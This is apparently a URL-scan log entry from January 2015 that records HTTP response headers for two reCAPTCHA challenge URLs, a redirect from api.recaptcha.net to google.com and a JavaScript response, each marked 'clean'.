http://api.recaptcha.net/challenge?k=6Ld9UAgAAAAAAMon8zjt30tEZiGQZ4IIuWXLt1ky | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, no-store, max-age=0, must-revalidate Connection: close Date: Wed, 14 Jan 2015 20:41:51 GMT Pragma: no-cache Location: http://www.google.com/recaptcha/api/challenge?k=6Ld9UAgAAAAAAMon8zjt30tEZiGQZ4IIuWXLt1ky Server: GSE Content-Type: text/html; charset=UTF-8 Expires: Fri, 01 Jan 1990 00:00:00 GMT Alternate-Protocol: 80:quic,p=0.02 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block
| clean |
http://www.google.com/recaptcha/api/challenge?k=6ld9uagaaaaaamon8zjt30tezigqz4iiuwxlt1ky | 200 OK Content-Length: 67 Content-Type: text/javascript | clean |